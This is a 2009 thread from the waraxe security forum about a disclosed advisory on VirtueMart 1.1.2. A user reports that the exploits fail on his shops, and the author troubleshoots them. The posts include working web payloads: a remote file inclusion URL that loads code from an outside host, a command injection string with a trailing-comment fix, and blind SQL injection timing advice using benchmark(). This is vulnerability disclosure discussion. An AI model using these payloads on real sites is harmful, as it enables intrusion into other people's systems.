Waraxe IT Security Portal
Login or Register
November 6, 2024
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 59
Members: 0
Total: 59
Full disclosure
4 vulnerabilities in ibmsecurity
32 vulnerabilities in IBM Security Verify Access
xlibre Xnest security advisory & bugfix releases
APPLE-SA-10-29-2024-1 Safari 18.1
SEC Consult SA-20241030-0 :: Query Filter Injection in Ping Identity PingIDM (formerly known as ForgeRock Identity Management) (CVE-2024-23600)
SEC Consult SA-20241023-0 :: Authenticated Remote Code Execution in Multiple Xerox printers (CVE-2024-6333)
APPLE-SA-10-28-2024-8 visionOS 2.1
APPLE-SA-10-28-2024-7 tvOS 18.1
APPLE-SA-10-28-2024-6 watchOS 11.1
APPLE-SA-10-28-2024-5 macOS Ventura 13.7.1
APPLE-SA-10-28-2024-4 macOS Sonoma 14.7.1
APPLE-SA-10-28-2024-3 macOS Sequoia 15.1
APPLE-SA-10-28-2024-2 iOS 17.7.1 and iPadOS 17.7.1
APPLE-SA-10-28-2024-1 iOS 18.1 and iPadOS 18.1
Open Redirect / Reflected XSS - booked-schedulerv2.8.5
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> All other software -> [waraxe-2009-SA#071] - Multiple Vulns in VirtueMart 1.1.2
Post new topicReply to topic View previous topic :: View next topic
[waraxe-2009-SA#071] - Multiple Vulns in VirtueMart 1.1.2
PostPosted: Sat Jan 24, 2009 5:45 pm Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




Check out my new advisory!

http://www.waraxe.us/advisory-71.html

P.S. I will probably write exploit for one of the blind sql injection vulnerabilities in VirtueMart, so stay tuned Smile
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Sat Jan 24, 2009 11:25 pm Reply with quote
Alkindiii
Regular user
Regular user
Joined: Jan 09, 2009
Posts: 19




Good job man!
I like the word Multiple Vulns Mr. Green
Greetz.
View user's profile Send private message
PostPosted: Mon Mar 16, 2009 3:48 pm Reply with quote
marathoneer
Regular user
Regular user
Joined: Mar 16, 2009
Posts: 6




I've tested first 2 exploits on my Virtuemart 1.1.2 shops (3 sites).

None of the works.

as for #1 with remote exectuion - there is no file "/usr/bin/htmldoc", so it's okey

#2 - I have all requirements up, still nothign.
View user's profile Send private message
PostPosted: Mon Mar 16, 2009 3:55 pm Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




marathoneer wrote:
I've tested first 2 exploits on my Virtuemart 1.1.2 shops (3 sites).

None of the works.

as for #1 with remote exectuion - there is no file "/usr/bin/htmldoc", so it's okey

#2 - I have all requirements up, still nothign.


You mean this one below?

Code:

2. Remote File Inclusion in "show_image_in_imgtag.php"

Security risk: high
Preconditions:
1. register_globals=on
2. allow_url_fopen=on (PHP < 5.2.0)
3. allow_url_include=on (PHP >= 5.2.0)

Test:

http://localhost/virtuemart112/components/com_virtuemart/show_image_in_imgtag.php?
mosConfig_absolute_path=http://www.waraxe.us


How did you test? @ localhost or against real target? How do you know php settings? From phpinfo()?
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Mon Mar 16, 2009 4:33 pm Reply with quote
marathoneer
Regular user
Regular user
Joined: Mar 16, 2009
Posts: 6




On the target.

And yes, information gathered from <?php phpinfo() ?>


Btw, about #1, if this should be used like?

URL/index.php?page=shop.pdf_output&option=com_virtuemart&showpage=';uname
View user's profile Send private message
PostPosted: Mon Mar 16, 2009 4:52 pm Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




In Remote Command Execution you need trailing comment symbol (#, urlencoded %23):

Code:

URL/index.php?page=shop.pdf_output&option=com_virtuemart&showpage=';uname%23
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Mon Mar 16, 2009 4:58 pm Reply with quote
lenny
Valuable expert
Valuable expert
Joined: May 15, 2008
Posts: 275




Very nice Waraxe, you never fail to amaze me Razz
View user's profile Send private message
PostPosted: Mon Mar 16, 2009 9:59 pm Reply with quote
marathoneer
Regular user
Regular user
Joined: Mar 16, 2009
Posts: 6




4. Sql Injection in "shop_browse_queries.php"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Security risk: high
Preconditions: none
Comments:
1. This is blind sql injection
===========================
Doesnt work for my websites, none of them.

I've tried to turn on debug mode - there is no error message while trying to use
index.php?page=shop.browse
&option=com_virtuemart&DescOrderBy=waraxe

Are u sure these bugs can really lead to MYSQL injection?
View user's profile Send private message
PostPosted: Mon Mar 16, 2009 10:05 pm Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




marathoneer wrote:
4. Sql Injection in "shop_browse_queries.php"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Security risk: high
Preconditions: none
Comments:
1. This is blind sql injection
===========================
Doesnt work for my websites, none of them.

I've tried to turn on debug mode - there is no error message while trying to use
index.php?page=shop.browse
&option=com_virtuemart&DescOrderBy=waraxe

Are u sure these bugs can really lead to MYSQL injection?


1. you must be logged in as admin in order to see sql error details
2. try benchmark() as in example and look for response delay
View user's profile Send private message Send e-mail Visit poster's website
[waraxe-2009-SA#071] - Multiple Vulns in VirtueMart 1.1.2
www.waraxe.us Forum Index -> All other software
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 1 of 1

Post new topicReply to topic


Powered by phpBB © 2001-2008 phpBB Group



Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.046 Seconds